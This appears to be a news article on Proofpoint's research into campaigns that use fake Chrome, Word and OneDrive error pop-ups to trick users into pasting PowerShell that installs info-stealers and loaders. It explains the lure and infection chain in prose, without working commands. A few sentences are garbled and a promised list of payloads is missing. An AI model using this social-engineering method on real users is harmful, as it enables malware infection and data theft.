Crafty criminals are targeting thousands of organizations around the world with social engineering attacks that use fake error messages to trick users into running malicious PowerShell scripts.
This latest Windows malware distribution campaign uses fake Google Chrome, Microsoft Word, and OneDrive error messages to resemble real alerts. After visiting a legitimate but compromised website, victims will see some sort of pop-up text box in their browser informing them that something went wrong. It’s an old but extremely effective trick. One that is worth knowing, we think, so that you can help prevent colleagues and others from falling for it.
Marks are then instructed to click a “fix” button and then paste the displayed code into a PowerShell terminal or Windows Run dialog box. This allows PowerShell to run another remote script that downloads and runs the malware on the victim’s PC.
Proofpoint malware hunters have spotted at least two criminal gangs using this technique to infect people’s machines. At least one of the gangs is most likely using it to spread ransomware, we’re told.
“While the attack chain requires significant user interaction to be successful, the social engineering is smart enough to present someone with what appears to be a real problem and a real solution at the same time, which can prompt a user to take action without regard to the risk,” says Tommy Madjar. , Dusty Miller and Selena Larson in a report out this week.
Proofpoint says it spotted a team called TA571 using this specific PowerShell-powered technique as early as March 1, and that the gang behind the ClearFake malware campaign has been using it since early April. Both were still active in early June, and a third campaign called ClearFix has also been testing them since May.
In these attacks, users visit a compromised website that loads a malicious script “hosted on the blockchain via Binance’s Smart Chain contracts,” according to the report – this is apparently called EtherHiding – which then loads a fake warning window in the browser that targets the victim. asked to install a “root certificate” to solve a fictitious problem.
The message contains instructions to copy a PowerShell script and then manually run it on the machine. This script flushes the DNS cache, deletes the clipboard contents, displays a decoy message to the user, and then downloads and runs a remote PowerShell script.
This remote script runs a series of Windows Management Instrumentation checks and then lets in the Lumma Stealer malware, which downloads three payloads:
In some cases, the Amadey malware downloads others, including a Go-based malware that threat hunters say they believe is the nasty JaskaGo software, which can be configured for both Windows and macOS machines.
“This means that a total of five different malware families can be executed by running just one initial PowerShell script,” they wrote.
Click-no-fix
The ClearFix campaign used a similar strategy. To do this, the attackers used a compromised website with an injection that led to an iframe overlay. This appears as a Google Chrome error message that also tells users to open “Windows PowerShell (Admin)” and then paste the sneaky code, which ultimately leads to the Vidar Stealer being downloaded and run.
The third campaign, which Proofpoint attributed to TA571, a team known for mass spamming its targets, sent more than 100,000 phishing emails to thousands of organizations around the world.
In this version, criminals send emails with a malicious HTML attachment disguised as a Microsoft Word page. It also displays an error message warning that the ‘Word Online extension is not installed’, and then gives two options: ‘How to fix’ and ‘Automatically fix’.
Clicking “How to fix this” copies a Base64 encoded PowerShell command to the computer’s clipboard with a message instructing the user to open PowerShell and right-click the console.
Meanwhile, the “Auto-fix button” uses the search-ms protocol to display a WebDAV-hosted “fix.msi” or “fix.vbs” file.
When the MSI file is executed, Matanbuchus, another malware loader, is installed, while the VBS file downloads and executes the DarkGate attack code.
“Proofpoint has high confidence that TA571 infections can lead to ransomware,” the researchers said, noting that this team is constantly adapting its email decoys and attack chains.
The security store also provides examples of indicators of compromise and recommends that organizations train employees to detect and report suspicious activity, especially in these types of social engineering attacks. ®